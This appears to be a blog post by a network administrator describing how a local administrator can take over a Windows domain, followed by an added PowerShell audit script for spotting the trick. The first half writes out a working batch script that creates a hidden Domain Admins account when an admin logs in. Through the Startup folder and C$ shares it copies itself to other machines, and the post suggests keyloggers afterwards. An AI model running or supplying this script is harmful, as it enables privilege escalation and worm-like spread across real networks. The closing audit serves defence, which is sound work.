I could have easily called this article “How to hack and take control of an entire Windows Network”, but that would draw a lot of negative attention, and it probably should. Let’s start off with a little background on the terminology for those who don’t know that much about Windows’ methods of networking. (You can skip to the next section otherwise.)
“Domain Admins” is the security group for users who have administrator rights on every machine that is a member of the domain. A domain is like a workgroup of computers that are under the control of the local Active Directory server. If you’re not in the domain you don’t have access to much. We’re going to change that, by gaining this level of access.
There are two basic types of users: Administrators and Users. Users aren’t allowed to do very much: they can’t install software, change things, etc. Administrators, on the other hand, have total control. Local administrators have control of that one computer only. Domain Administrators have control over all PCs that are part of the domain. In particular they have access to the root share, C$, the default share on every Windows Professional based PC. If you can become Domain Admin, you can access every file on every computer through this share!
Now, many legacy applications will fail to run as a simple user, so it’s common practice to make a “User” a “Local Admin” of a computer. That means the user can add printers and add/remove software on their own PC. This way the PC is still managed, but the user has more freedom to blow up their computer doing awesome stunts like deleting c:/windows/system32 to save space. “But I don’t use that so I thought it was ok to delete…”
If you can grasp all that, I’ll go ahead into the description of how you elevate from “Local Admin” to “Domain Admin”.
How do I turn my local admin into a Domain Admin?
Ok, this is where I’m going to scare you a bit. It’s easy: you don’t need any tools or any expert know-how. You only need to type these two lines into a batch file!
net user /domain /add dirtyhackor mysecretpass
net group /domain "Domain Admins" /add dirtyhackor
The first line creates a new user on the domain named dirtyhackor, and the second line adds that user to the Domain Admins group. The masters of Windows domains may be laughing right now, because they know this script won’t fly as is: ordinary users don’t have the right to create users, so they will only get an error, and Mr. Admin, you are too sly to run a batch script without reading it first, right? Well, how about these apples: place the script in the All Users folder under Programs in the “Startup” folder on this computer. Now when the domain admin walks by to fix your computer and logs in, they will unknowingly run this script and voilà! Now you have a secretly created user called “dirtyhackor” on the domain with full access to everything!
But how do you get a domain admin to access your computer? A little sabotage can usually get a member of the domain to sign into your (target) computer. Many users are also members of multiple computers as well. What if you wanted to get your newly found batch script onto all of the computers you are a local admin on? Just one more line of batch will let us easily spread the script to other computers over the network!
net user /domain /add dirtyhackor mysecretpass
net group /domain "Domain Admins" /add dirtyhackor
for /F %%i in ('net view') do copy /Y %0 "%%i\c$\documents and settings\all users\start menu\programs\startup"
As you can see, the first two lines are the same as in the previous example, but the third line will scan for all PCs on the local network and, for the ones you have local admin rights to, will copy this script into each computer’s Startup folder! So let’s say three people work at the one workstation. Sam logs in, and this spreads to all computers he has access to. Then Sally logs in and it spreads to all of her workstations, followed by Steve. If they all have access to 3 computers each, that’s 7 computers with the script on them now. Then, as anyone uses those computers, the pattern of spreading continues throughout the network! Eventually a domain admin will run the script and you’re in!
What can you do with this power? Install software on any PC remotely: keyloggers, spam senders, web servers, game servers, backup storage, anything you would want. So if you’re a network admin (like me), you’re probably thinking hard about all the times you’ve logged in to a workstation! So what can you do against this threat? Being aware of this type of trickery is a start, and secondly, make sure you assign Domain Admin to as few people as possible.
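For the admin side, here is an audit for the two tell-tale signs the post leaves you with: anything in the all-users Startup folder runs under whoever logs in next, and a name you don’t recognise in Domain Admins is the result. This is added example code, not from the original post, and it assumes a domain-joined admin workstation with the RSAT ActiveDirectory module, PowerShell Remoting enabled on the targets, and the placeholder computer and admin names replaced with your own.

```powershell
# Added defensive audit; not from the original post. Assumes a domain-joined admin
# workstation with the RSAT ActiveDirectory module, PowerShell Remoting enabled on
# the targets, and the placeholder names below replaced with your own.
param(
    [string[]]$ComputerName = @('WKS01', 'WKS02'),         # placeholder targets
    [string[]]$ExpectedDomainAdmins = @('Administrator')   # placeholder baseline
)

Import-Module ActiveDirectory

# Check 1: the all-users Startup folder. Whatever sits here runs under the token of
# every interactive logon on that machine, which is how the batch file above waits
# for a Domain Admin. Flag script and executable types, hidden files included.
$riskyTypes = '.bat', '.cmd', '.vbs', '.js', '.ps1', '.exe', '.lnk'
$startupHits = Invoke-Command -ComputerName $ComputerName -ErrorAction Continue `
    -ArgumentList (,$riskyTypes) -ScriptBlock {
    param([string[]]$types)
    # Resolves to the right path for the OS version (Documents and Settings on XP,
    # ProgramData on newer Windows).
    $dir = [Environment]::GetFolderPath('CommonStartup')
    Get-ChildItem -LiteralPath $dir -File -Force -ErrorAction SilentlyContinue |
        Where-Object { $_.Extension -in $types } |
        Select-Object FullName, LastWriteTime, Length
}

if ($startupHits) {
    Write-Warning 'Scripts or executables found in all-users Startup folders:'
    $startupHits | Format-Table PSComputerName, FullName, LastWriteTime, Length -AutoSize
} else {
    Write-Host 'No script or executable entries in the all-users Startup folders.'
}

# Check 2: Domain Admins membership against a known-good list. The script in the post
# adds a brand-new account here, so an unexpected name is the tell-tale sign.
$members = Get-ADGroupMember -Identity 'Domain Admins' -Recursive |
    Select-Object -ExpandProperty SamAccountName
$unexpected = @($members | Where-Object { $_ -notin $ExpectedDomainAdmins })

if ($unexpected.Count -gt 0) {
    Write-Warning "Unexpected Domain Admins members: $($unexpected -join ', ')"
    # A very recent whenCreated next to a Startup hit above is the exact pattern.
    foreach ($name in $unexpected) {
        Get-ADUser -Identity $name -Properties whenCreated -ErrorAction SilentlyContinue |
            Select-Object SamAccountName, whenCreated, Enabled
    }
} else {
    Write-Host 'Domain Admins membership matches the expected list.'
}
```

Run it on a schedule and diff the output against the previous run; the cheapest fix for the whole scenario is still the post’s own advice, fewer Domain Admins, plus never using one of those accounts to log in to a workstation.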
Spread the word! E-mail this to someone you know needs to be aware of this, and please Stumble or Digg this, as that will really help get the word out! Thanks for reading!!! +Green